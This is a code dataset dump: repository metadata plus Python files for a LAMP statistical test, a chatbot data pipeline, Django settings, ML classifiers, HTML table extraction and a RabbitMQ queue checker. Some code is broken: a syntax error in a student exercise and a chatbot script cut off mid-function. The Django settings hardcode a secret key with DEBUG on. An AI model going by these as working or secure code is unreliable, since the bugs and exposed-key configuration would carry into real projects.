blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9d82cd9f0f653d64354eb86703a1e008bb78b661 | 43cb7845e503bd475b79125c842b6b3fcffaca6d | /lamp_ep.py | 7d9f1353ce853e5cabff5d09aa5bf8f0ccf60049 | [] | no_license | KAZYPinkSaurus/lamp-ep | 7d1799a7e6eaa3565ba15d23e4cd3a0e56ebccab | 47da33f1aaa8d4b63ce1d7b2d4948bf0583aa93d | refs/heads/master | 2021-09-15T01:35:10.251418 | 2018-05-23T13:48:51 | 2018-05-23T13:48:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,611 | py | import math
import pandas as pd
import numpy as np
class Lamp_ep():
def __init__(self,aA=0.7,aQ=0.05,aMax_min_sup=100,aDataset=pd.DataFrame()):
"""
a in (0,1)
Parameters
-------
aMax_min_sup : int
min_supの最大値
aDataset : DataFrame
カラム名指定(['pattern','Nep','Ne'])
"""
if(aA >= 1 or aA <= 0):
print("Error:a=!(0~1)")
exit()
self.mA = aA
self.mMax_min_sup = aMax_min_sup
self.mQ = aQ
self.mDataset = aDataset
def __get_min_tau(self):
"""
τの一番小さいやつを得る
"""
for i in range(1,self.mMax_min_sup):
print("i="+str(i)+" "+str(self.mA**i)+"<="+str(self.mQ/len(self.mining_eps_alg(i).index)))
if self.mA**i <= self.mQ/len(self.mining_eps_alg(i).index):
return i
print("τが得られなかった")
exit()
def __get_corrected_pvs(self, aTau):
"""
選ばれたτでパターン抽出を行い全てで多重検定をい,パターンとp値を返す
"""
# ε_alg取得
tEps_alg = self.mining_eps_alg(aTau)
tEps_alg_size = len(tEps_alg.index)
# q/ε_algでボンフェローニ補正を行う
tPes = []
for i in tEps_alg.index:
tPes.append(tEps_alg_size*self.__pe(tEps_alg['Nep'][i],tEps_alg['Ne'][i]))
tPv = pd.DataFrame(tPes,index=tEps_alg.index,columns=['p-value'])
return pd.concat([tEps_alg,tPv],axis=1)
def extract(self):
"""
Mining and Multiple testing
Returns
-------
tPtn_Pv : DataFrame
pattern and P-value
"""
print("Step1,2を行う(Tarone的手順)")
tTau = self.__get_min_tau()
print("selcted tau:"+str(tTau))
tPtn_Pv = self.__get_corrected_pvs(tTau)
return tPtn_Pv
def __kl(self,aP,aQ):
"""
KLダイバージェンス計算
"""
return aP*math.log(aP/aQ)+(1-aP)*math.log((1-aP)/(1-aQ))
def __pe(self,aNep,aNe):
"""
approximate P-value
"""
tMue=aNep/aNe
if tMue > self.mA:
return math.exp(-aNe*self.__kl(tMue,self.mA))
else:
return 1
#####仮 あとで別のファイルに分ける(とりあえずtestデータ)###
# NeがaMin_sup以上のトランザクションを返す
def mining_eps_alg(self, aMin_sup):
return self.mDataset[self.mDataset['Ne']>= aMin_sup]
| [
"nishi@Nishis-MacBook.local"
] | nishi@Nishis-MacBook.local |
1070cd8566457d889b1f144ee8456b63946d6861 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/40/usersdata/81/18116/submittedfiles/funcoes.py | 54b96934c77ea74865637ac40054305beadee568 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 297 | py | #ARQUIVO COM SUAS FUNCOES
def cos(e,fat):
soma=0
while 0<soma<=e:
for j in range(1,e,1):
for i in range(2,e,2):
soma=soma+(((e**i)/fat)+((-1)**j))
def razao(pi,cos):
aurea=2*cos.(pi/5)
return aurea
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
eec2105832578fcd5e5ac327826762df397aeb18 | bb87cbbe27968a91f4dade7e153cea0d5759a29f | /chatbot.py | e188e8492c12ef375244c8143bc57b7f865ff037 | [] | no_license | diksha096/Hacktoberfest | 976f123d681e78907d980c176a704a8be4527185 | a39a8f2a11db664480116d9433864cab0916c52b | refs/heads/master | 2020-04-02T20:04:59.043696 | 2018-10-27T19:10:50 | 2018-10-27T19:10:50 | 154,757,420 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,942 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 16 00:55:19 2018
@author: dikshasharma
"""
import tensorflow as tf
import re
import time
import numpy as np
lines=open('movie_lines.txt',encoding='utf-8',errors='ignore').read().split('\n')
conversations=open('movie_conversations.txt',encoding='utf-8',errors='ignore').read().split('\n')
#create a dictionary to map lines with their ids
idline={}
for line in lines:
line=line.split(' +++$+++ ')
if len(line)==5:
idline[line[0]]=line[4]
#create a list of all the conversation ids
conversation_ids=[]
for conversation in conversations[:-1]:
conversation=conversation.split(' +++$+++ ')[-1][1:-1].replace("'","").replace(" ","")
conversation_ids.append(conversation.split(','))
#create a list for questions and answers
questions=[]
answers=[]
for conversation in conversation_ids:
for i in range(len(conversation)-1):
questions.append(idline[conversation[i]])
answers.append(idline[conversation[i+1]])
def clean_text(text):
text=text.lower()
text=re.sub(r"i'm"," i am",text)
text=re.sub(r"he's"," he is",text)
text=re.sub(r"she's"," she is",text)
text=re.sub(r"that's"," that is",text)
text=re.sub(r"what's"," what is",text)
text=re.sub(r"where's"," where is",text)
text=re.sub(r"\'ll"," will",text)
text=re.sub(r"\'ve"," have",text)
text=re.sub(r"\'re"," are",text)
text=re.sub(r"\'d"," would",text)
text=re.sub(r"[- #@;() / <> + = {} ~ | ? .]"," ",text)
return text
#clean questions
clean_questions=[]
for question in questions:
clean_questions.append(clean_text(question))
#clean answers
clean_answers=[]
for answer in answers:
clean_answers.append(clean_text(answer))
wordcount={}
for question in clean_questions:
for word in question.split():
if word not in wordcount:
wordcount[word]=1
else:
wordcount[word]+=1
for answer in clean_answers:
for word in answer.split():
if word not in wordcount:
wordcount[word]=1
else:
wordcount[word]+=1
threshold=20
questionword2int={}
word_number=0
for word,count in wordcount.items():
if count>=threshold:
questionword2int[word]=word_number
word_number+=1
answerword2int={}
word_number=0
for word,count in wordcount.items():
if count>=threshold:
answerword2int[word]=word_number
word_number+=1
tokens=['<PAD>','<EOS>','<OUT>','<SOS>']
for token in tokens:
questionword2int[token]=len(questionword2int)+1
for token in tokens:
answerword2int[token]=len(answerword2int)+1
answerint2word={w_i:w for w,w_i in answerword2int.items()}
#Adding end of string token at the end of every answer
for i in range(0,len(clean_answers)):
clean_answers[i]+=' <EOS>'
questions_to_int=[]
for question in clean_questions:
ints=[]
for word in question.split():
if word not in questionword2int:
ints.append(questionword2int['<OUT>'])
else:
ints.append(questionword2int[word])
questions_to_int.append(ints)
answers_to_int=[]
for answer in clean_answers:
ints=[]
for word in answer.split():
if word not in answerword2int:
ints.append(answerword2int['<OUT>'])
else:
ints.append(answerword2int[word])
answers_to_int.append(ints)
sorted_clean_questions=[]
sorted_clean_answers=[]
for length in range(1,25+1):
for i in enumerate(questions_to_int):
if len(i[1])==length:
sorted_clean_questions.append(questions_to_int[i[0]])
sorted_clean_answers.append(answers_to_int[i[0]])
#STEP2 SEQ2SEQ MODEL
def model_inputs():
inputs=tf.placeholder(tf.int32,['None','None'],name='input')
targets=tf.placeholder(tf.int32,['None','None'],name='target')
lr=tf.placeholder(tf.float32,name='learning rate')
keep_prob=tf.placeholder(tf.float32,name='keep prob')
return inputs,targets,lr,keep_prob
def prepprocess_targets(targets,word2int,batch_size):
left_sie=tf.fill([batch_size,1],word2int['<SOS>'])
right_side=tf.strided_slice(targets,[0,0],[batch_size,-1],[1,1])
prepocessed_targtes=tf.concat([left_sie,right_side],1,)
return prepocessed_targtes
def encoder_rnn_layer(rnn_inputs,rnn_size,num_layers,keep_prob,sequence_length):
lstm=tf.contrib.rnn.BasicLSTMCell(rnn_size)
lstm_dropout=tf.contrib.rnn.DropoutWrapper(lstm,input_keep_prob=keep_prob)
encoder_cell=tf.contrib.rnn.MultiRNNCell([lstm_dropout]*num_layers)
_,encoder_state=tf.nn.bidirectional_dynamic_rnn(cell_fw=encoder_cell,
cell_bw=encoder_cell,sequence_length=sequence_length,inputs=rnn_inputs,dtype=int32)
return encoder_state
#decoding the training set
def decode_training_set(encoder_state,decoder_cell,):
| [
"noreply@github.com"
] | diksha096.noreply@github.com |
6481ee12912b8fdd44b93e6877122c399e386851 | b38e2fada052a3516522e708a53abe5b6393eb3f | /mysite/settings.py | f0bfda05a3b258407ff400b011fc89198e29fd99 | [] | no_license | EkaterinaIvanovaa/my_django_sit | d65d4f013f1839882230fd755a98ae47fa91b22e | cc9f489a8daf0666007ff8d0f9fec4d9addc6814 | refs/heads/master | 2022-07-02T23:09:45.767199 | 2020-05-17T15:07:13 | 2020-05-17T15:07:13 | 264,697,497 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,214 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.2.12.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'z_pp*2@2r4&&4)zttpc1ys%))-a2_*&@*pyhl9^ee(vpeb$q@#'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'template')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'ru'
TIME_ZONE = 'Asia/Yekaterinburg'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media') | [
"katyuha-2011@yandex.ru"
] | katyuha-2011@yandex.ru |
44c09e443e221fdc991fc6f234d4d767cea183ad | 72daf73c49769980f19c6c290d5021bfef6bcbf1 | /bagging.py | 2f13770fe338b8c571a174f7de758525740ce43b | [] | no_license | MarschildX/IncomePredict | a42279a593ef954c3eb207775b4ddb40b2ef1a6d | c806e5561f95a69ffa446a5b14f291c90766009c | refs/heads/master | 2023-01-22T14:42:39.185187 | 2020-11-28T16:55:32 | 2020-11-28T16:55:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,260 | py | import numpy as np
import pandas as pd
from sklearn.ensemble import BaggingClassifier
from sklearn import metrics
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neural_network import MLPClassifier
data_train = pd.read_csv('./processed_data/train_5.csv')
test = pd.read_csv('./processed_data/test_5.csv')
# normalize
data_train_y = data_train.iloc[:, -1]
data_train.drop(columns=['exceeds50K'], inplace=True)
data_all = pd.concat([data_train, test], axis=0)
data_all = (data_all-data_all.mean()) / data_all.std()
data_train = data_all[0:data_train_y.shape[0]]
test = data_all[data_train_y.shape[0]:]
data_train = pd.concat([data_train, data_train_y], axis=1)
train = data_train.sample(frac=0.75, random_state=0, axis=0)
validate = data_train[~data_train.index.isin(train.index)]
train = np.array(train)
validate = np.array(validate)
test = np.array(test)
x_train = train[:, 0:-1]
y_train = train[:, -1]
x_validate = validate[:, 0:-1]
y_validate = validate[:, -1]
clf = BaggingClassifier(base_estimator=MLPClassifier(hidden_layer_sizes=(20, 2), alpha=1e-5, random_state=1,
max_iter=1000), n_estimators=50, bootstrap=True)
clf.fit(x_train, y_train)
y_validate_pred = clf.predict(x_validate)
print('Accuracy score:', metrics.accuracy_score(y_validate, y_validate_pred))
# KNN model, train_1 Accuracy score: 0.8283374283374283
# KNN, train_2 Accuracy score: 0.8337428337428338
# KNN, train_3 Accuracy score: 0.8298116298116298
# KNN, train_4 Accuracy score: 0.8314496314496315
# KNN, train_5 Accuracy score: 0.8384930384930385
# MLP, train_5, Accuracy score: 0.8576576576576577
train_all = np.array(data_train)
x_train_all = train_all[:, 0:-1]
y_train_all = train_all[:, -1]
clf2 = BaggingClassifier(base_estimator=MLPClassifier(hidden_layer_sizes=(20, 2), alpha=1e-5, random_state=1,
max_iter=1000), n_estimators=50, bootstrap=True)
clf2.fit(x_train_all, y_train_all)
test_pred = np.int_(clf2.predict(test))
print(test_pred)
idx = np.arange(len(test_pred))+1
result = np.vstack([idx, test_pred]).T
df_result = pd.DataFrame(data=result, columns=['id', 'prediction'])
df_result.to_csv('./result/bagging_res_process5.csv', index=None)
| [
"ai.xufang@qq.com"
] | ai.xufang@qq.com |
4916c7ffb221a17d73a7312b25205170ea38e80e | 404728244681a773f55be7f7b0c4933f439f3106 | /walis/service/cs/user.py | 280b7d3b8e645daa0b6ad2bf034f55f790409a92 | [] | no_license | limingjin10/walis | c4e22db27d964cefa068883edf979cabfedd74d6 | 198a4e94992c1790b7a9f2cd34b1686fefc87845 | refs/heads/master | 2021-05-29T04:50:34.091849 | 2015-06-15T14:19:23 | 2015-06-15T14:19:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,155 | py | #!/usr/bin/env python2
# coding=utf8
from __future__ import absolute_import, division, print_function
from walis.service.rst import restaurant as rst_base
from walis.service.user import user as user_base
from walis.model.walis.cs import CSEvent
def get_user_by_phone(mobile):
user_type = None
result = {'user_type': CSEvent.USER_TYPE_OTHERS}
rst = rst_base.get_by_mobile(mobile)
if rst:
user_type = CSEvent.USER_TYPE_MERCHANT
result = {
'user_type': user_type,
'restaurant_id': rst.id,
'restaurant_name': rst.name,
'phone': rst.phone
}
user = user_base.get_by_mobile(mobile)
if not user:
return result
result.update({'user_id': user.id, 'user_name': user.username})
if user_type == CSEvent.USER_TYPE_MERCHANT:
return result
is_marketing = user_base.has_groups(
user.id,
['region_director', 'city_director', 'entry_director']
)
if is_marketing:
result.update({'user_type': CSEvent.USER_TYPE_MARKETING})
else:
result.update({'user_type': CSEvent.USER_TYPE_USER})
return result
| [
"shaofeirong2006@126.com"
] | shaofeirong2006@126.com |
d23c134f5bcb7023e2df5e4f74ecc73a18ecd3e3 | 177a630e29faa05eed002a3be743f669f845168d | /STATAwithinPython/RunSTATAdoInPython.py | 4972fd30bb5025f93d3bc399e360a24b088b4d87 | [
"MIT"
] | permissive | babakrezaee/DataWrangling | 40156a0b31a340db8de9a75a0bc2514373f2c23e | dbc838dcae9bc6b7aeb9f3e1c0a16e67fbd90935 | refs/heads/master | 2021-05-03T09:10:49.859157 | 2019-07-27T14:35:18 | 2019-07-27T14:35:18 | 120,571,075 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | py | ## Set dofile address
## Set the path to your STATA .exe file, from the folder you installed STATA
## Do not forget that dofile and STATA should be in string
def dostata(dofile, STATA):
import subprocess
cmd=[STATA,'do', dofile]
subprocess.call(cmd)
| [
"noreply@github.com"
] | babakrezaee.noreply@github.com |
33f7d80dae4496675e4a3219399e55bbaade6bad | 25f2f36f7bd1e4af75681935780a625363e663fa | /文本及表格提取代码.py | 64cb3dd16ed0336aed899bd8e9d4508b319d6f61 | [] | no_license | jianxinjiao/Cnki | 78061dcc1c629e12a190eaf7276f8e8b63334d9c | e3a2265a8221d52ec6e8dd3df9ef96a8e2c7b281 | refs/heads/master | 2023-05-27T08:01:13.109180 | 2021-06-18T03:14:31 | 2021-06-18T03:14:31 | 378,003,975 | 0 | 0 | null | null | null | null | GB18030 | Python | false | false | 9,782 | py | import os
import re
import base64
import pandas as pd
from bs4 import BeautifulSoup
from html.parser import HTMLParser
class MyHTMLParser(HTMLParser):
res_list = list()
value = 0
label_list = ['div', 'br', 'p', 'title', 'ul', 'li', 'table', 'tr', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'h7']
def handle_starttag(self, tag, attrs):
if tag == 'br':
self.res_list.append([self.value, 'data', '\n'])
else:
self.value += 1
self.res_list.append([self.value, 'starttag', tag])
def handle_endtag(self, tag):
self.res_list.append([self.value, 'endtag', tag])
self.value -= 1
def handle_data(self, data):
data = data.replace(' ', '')
if data:
self.res_list.append([self.value, 'data', data])
def get_join_str(self):
_res_str = str()
_res = self.res_list # 临时变量
for i in range(len(_res)):
if i == 0 or i == len(_res) - 1:
continue
tree_label = _res[i][1]
tree_value = _res[i][2]
if tree_label == 'endtag' and tree_value in self.label_list:
if _res[i-1][1] == 'endtag' and _res[i-1][2] in self.label_list:
pass
else:
_res_str += '\n'
if tree_label == 'data':
_res_str += tree_value
if not _res_str.replace('\n', '').replace(' ', ''):
_res_str = ''
return _res_str
def remove_html_label(html_str: str):
re_script = re.compile('<script.*?</script>', re.I)
re_style = re.compile('<style.*?</style>', re.I)
re_style = re.compile('<iframe.*?</iframe>', re.I)
re_notes = re.compile('<!--.*?-->', re.I)
re_span = re.compile('<span style="display:none".*?</span>', re.I)
# 格式处理
html_str = html_str.replace('\n', '')
new_html_str = re_script.sub('', html_str)
new_html_str = re_style.sub('', new_html_str)
new_html_str = re_notes.sub('', new_html_str)
new_html_str = re_span.sub('', new_html_str)
return new_html_str
def get_text_str(html_str: str):
html_str = remove_html_label(html_str)
parser = MyHTMLParser()
parser.res_list = list()
parser.value = 0
parser.feed(html_str)
html_text = parser.get_join_str()
return html_text
def get_table_list(table_str: str):
soup = BeautifulSoup(table_str, 'lxml')
table_trs = soup.findAll('tr')
tr_val_list = list() # [*, *, ...]
for tr_i in range(len(table_trs)):
table_tds_ths = table_trs[tr_i].findAll(['td', 'th'])
# if len(table_tds_ths) == 0:
# continue
td_th_val_list = list()
for td_th_i in range(len(table_tds_ths)):
val = table_tds_ths[td_th_i].getText()
colspan = table_tds_ths[td_th_i].get('colspan')
rowspan = table_tds_ths[td_th_i].get('rowspan')
if rowspan:
try:
rowspan = int(rowspan)
except ValueError:
rowspan = 1
insert_val = [val, int(rowspan)]
else:
insert_val = [val, 1]
if colspan:
try:
colspan = int(colspan)
except ValueError:
colspan = 1
td_th_val_list += [insert_val] * int(colspan)
else:
td_th_val_list.append(insert_val)
if len(td_th_val_list) == 0:
return ''
if tr_i == 0:
tr_val_list.append(td_th_val_list)
else:
td_th_val_list.reverse()
res_td_th_list = list()
for i in tr_val_list[tr_i - 1]:
if i[1] > 1:
res_td_th_list.append([i[0], i[1] - 1])
else:
try:
td_th_val = td_th_val_list.pop()
except IndexError:
continue
res_td_th_list.append(td_th_val)
tr_val_list.append(res_td_th_list)
res_list = [[y[0] for y in x] for x in tr_val_list]
return res_list
def panduanFlag(table_val):
sign = ['\xa0', '\u3000', '']
table_val = list(set(table_val))
for x in table_val:
if x not in sign:
return True
return False
def split_table(table_list):
flag_list = [0]
table_start = 0
table_end = 0
for i in range(len(table_list)):
if 1 not in flag_list and len(set(table_list[i])) != 1:
flag_list.append(1)
table_start = i
if len(set(table_list[i])) == 1 and 1 in flag_list:
table_end = i
break
if table_end == 0:
table_end = len(table_list)
text_start_list = table_list[:table_start] # [] / [[], []]
table = table_list[table_start: table_end] # [[], []]
text_end_list = table_list[table_end:] # [] / [[], []]
col_len = len(table[0])
fill_list = [''] * col_len
text_start_list = [x[0] for x in text_start_list if len(x) > 0 and x[0].replace(' ', '').replace('\n', '').replace('\xa0', '')]
if text_start_list:
text_start_list = text_start_list + [''] * (col_len - len(text_start_list))
else:
text_start_list = fill_list
table.insert(0, fill_list)
text_end_list = [x[0] for x in text_end_list if len(x) > 0 and x[0].replace(' ', '').replace('\n', '')]
if text_end_list:
text_end_list = [[x] + [''] * (col_len - 1) for x in text_end_list]
else:
text_end_list = fill_list
# res_list = [text_start_list] + table + [text_end_list]
res_list = [text_start_list] + table
return res_list
def handle_table_list(table_list: list):
table_list = [x for x in table_list if panduanFlag(x)]
if len(table_list) == 0:
return ''
if len(table_list[0]) == 1:
res = '。\n'.join(x[0] for x in table_list if len(x) != 0)
elif len(table_list[0]) == 2:
flag = False
for x in table_list:
a = x[-1].strip()
if len(a) > 0 and a[-1].isdigit():
flag = True
break
res = split_table(table_list) if flag else '。\n'.join([','.join(x) for x in table_list])
else:
res = split_table(table_list)
return res
def get_title_list(text_str: str):
text_list = text_str.split('\n')
text_list.reverse()
unit = ''
for text in text_list:
title = text.strip(' ').replace('\xa0', '').replace('\t', '').replace('\u3000', '')
if len(title) > 0 and title.startswith('单位'):
unit = title
elif len(title) > 0:
title = title.replace(" ", "##")[:50]
if len(unit) > 0:
title = title + '&&' + unit
return title
return ''
def extract_txt_table(html_text):
html_str = remove_html_label(html_text)
soup = BeautifulSoup(html_str, 'lxml')
table_ys = soup.findAll('table')
if len(table_ys) == 0:
txt_str = get_text_str(html_str)
return txt_str, []
table_list = list()
for table in table_ys:
if len(re.findall('</table>', str(table), re.S)) == 1:
table_list.append(str(table))
soup_str = str(soup)
html_list = list()
for i in range(len(table_list)):
split_list = soup_str.split(table_list[i])
other_str = split_list[0]
soup_str = split_list[1]
if len(split_list) > 2:
soup_str = f'{table_list[i]}'.join(split_list[1:])
html_list += [get_text_str(other_str), get_table_list(table_list[i])]
if i == len(table_list)-1:
html_list.append(get_text_str(soup_str))
html_list = [x for x in html_list if x] # 去掉空值
html_list = [x if type(x) == str else handle_table_list(x) for x in html_list]
table_res = list()
for i in range(len(html_list)):
if i == 0:
if type(html_list[i]) == str:
type_flag = 0
else:
type_flag = 1
table_res.append(html_list[i])
continue
if type(html_list[i]) == str:
if type_flag == 0:
table_res[-1] = table_res[-1] + '\n' + html_list[i]
else:
table_res.append(html_list[i])
type_flag = 0
else:
table_res.append(html_list[i])
type_flag = 1
txt_list, table_list = [], []
for i in range(len(table_res)):
value = table_res[i]
if isinstance(value, list):
if len(value[0][0]) > 0:
title_str = value[0][0].strip().replace(' ', '_')
else:
if i != 0 and isinstance(table_res[i -1], str):
title_str = get_title_list(table_res[i - 1])
else:
title_str = '未找到标题'
if len(value) > 2 and len(value[0]) > 0:
value_list = [[title_str, ''*(len(value[0])-1)]] + value[2:]
df = pd.DataFrame(value_list)
filePath = r'./data/table.xlsx'
df.to_excel(filePath, header=None, index=None)
with open(filePath, 'rb') as f:
table_str = f.read()
encodestr = base64.b64encode(table_str)
table_br = encodestr.decode()
if os.path.exists(filePath):
os.remove(filePath)
table_list.append({"title": title_str, "content": table_br})
elif isinstance(value, str):
value = value.replace(' ', '').replace('。\n', '\n').replace('\n', '。\n')
txt_list.append(value)
txt_str = '\n'.join(txt_list).replace('\n。', '')
return txt_str, table_list
| [
"18236578618@163.com"
] | 18236578618@163.com |
82f3e426ff64ad3759aa251a48b9dbf3f4b6602d | e8b379292c137fe2ef783f1e339f06973ab58925 | /padddle.py | c26f469b577cefae89469331962659a1281365c8 | [] | no_license | ayushi25jaiswal/pong_game | 7a004e7daf3a30d84b440759457336e1a0f33ec1 | c186c339348567a12b9eca3c474f3d179be02f90 | refs/heads/master | 2023-07-15T15:16:26.678682 | 2021-09-07T06:21:27 | 2021-09-07T06:21:27 | 403,864,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 491 | py | from turtle import Turtle
class Paddle(Turtle):
def __init__(self, x_cor, y_cor):
super().__init__()
self.shape("square")
self.color("white")
self.shapesize(stretch_wid=3, stretch_len=0.5)
self.penup()
self.goto(x_cor, y_cor)
self.speed("fastest")
def up(self):
y_cor = self.ycor() + 40
self.goto(self.xcor(), y_cor)
def down(self):
y_cor = self.ycor() - 40
self.goto(self.xcor(), y_cor) | [
"ayushijaiswal2507@gmail.com"
] | ayushijaiswal2507@gmail.com |
659e4d298c6b0016bd4b3417190d4ad431ea381a | d78a93aee67511c7f8b2b555aa02b3935a6b531e | /student/migrations/0003_auto_20180629_1109.py | b2f5e44e36b81dd36f586d411e1f1ad069efa03e | [] | no_license | bigbizzy001/student_portal | d7780ea6d78d8ac4ceae70b8d6022cbc085af688 | 303ed233f362035b0b3a6a089e29ff64b6cb113b | refs/heads/master | 2020-03-26T17:44:52.233874 | 2018-08-18T00:44:29 | 2018-08-18T00:44:29 | 145,177,846 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 851 | py | # Generated by Django 2.0.4 on 2018-06-29 10:09
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('student', '0002_auto_20180627_1400'),
]
operations = [
migrations.DeleteModel(
name='HallVenueArrangement',
),
migrations.AlterField(
model_name='timetableone',
name='day',
field=models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, related_name='day_first', to='student.LectureDay'),
),
migrations.AlterField(
model_name='timetabletwo',
name='day',
field=models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, related_name='day_second', to='student.LectureDay'),
),
]
| [
"marcusbourdelon@gmail.com"
] | marcusbourdelon@gmail.com |
bee7f7fa94cd9ef606a12c92afa48b6f4531a465 | 41d032c8a80e1fc124f2aba88c409051d3455ee0 | /simple_queue_waiter.py | ce76c9b46d6a25239b3d3eba3fb94033a0ff78ca | [
"Apache-2.0"
] | permissive | KernelPryanic/simple-queue-waiter | 9c33f9dd203f40925232adf0d451fdf77d0b9e81 | bc831756b4e62cde19f53788b18f38c609160eda | refs/heads/master | 2021-09-08T21:21:02.372814 | 2018-03-12T08:29:30 | 2018-03-12T08:29:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,987 | py | from collections import MutableSequence
from multiprocessing.pool import ThreadPool
import sys
import time
import yaml
import pika
class SimpleChecker(object):
def __init__(self, host, port, virtual_host, queue, user, password):
self.host = host
self.port = port
self.virtual_host = virtual_host
self.queue = queue
self.user = user
self.password = password
class Checker(MutableSequence, object):
def __init__(self, period=10, threads=2):
self.period = period
self.threads = threads
self.simples = []
# Collection methods start
def __getitem__(self, index):
return self.simples[index]
def __setitem__(self, index, value):
self.simples[index] = value
def __delitem__(self, index):
del self.simples[index]
def __iter__(self):
return iter(self.simples)
def __len__(self):
return len(self.simples)
# Collection methods end
def add(self, sc):
if isinstance(sc, SimpleChecker):
self.simples.append(sc)
def insert(self, index, sc):
if isinstance(sc, SimpleChecker):
self.simples.insert(index, sc)
def index(self, sc):
if isinstance(sc, SimpleChecker):
self.simples.index(sc)
def remove(self, sc):
if isinstance(sc, SimpleChecker):
self.simples.remove(sc)
def check(self, simple):
connection = pika.BlockingConnection(
pika.ConnectionParameters(
host=simple.host,
port=simple.port,
virtual_host=simple.virtual_host,
credentials=pika.PlainCredentials(simple.user, simple.password)
)
)
channel = connection.channel()
# channel.queue_declare(queue=simple.queue, durable=True)
try:
res = channel.queue_declare(queue=simple.queue, passive=True)
except:
print("Can't connect to queue")
connection.close()
return []
connection.close()
return res.method.message_count
def run(self):
results = [1]
while True:
pool = ThreadPool(self.threads)
results = pool.map(self.check, self.simples)
pool.close()
pool.join()
print(results)
if all(el == 0 for el in results):
break
time.sleep(self.period * 60)
def main():
try:
with open(sys.argv[1], "r") as config:
conf = yaml.load(config)
ch = Checker(conf["period"], conf["threads"])
for el in conf["targets"]:
ch.add(SimpleChecker(el["host"], el["port"], el["virtual_host"],
el["queue"], el["user"], el["password"]))
ch.run()
except KeyboardInterrupt:
print('\nThe process was interrupted by the user')
raise SystemExit
if __name__ == "__main__":
main()
| [
"dtrishkin@datanyze.com"
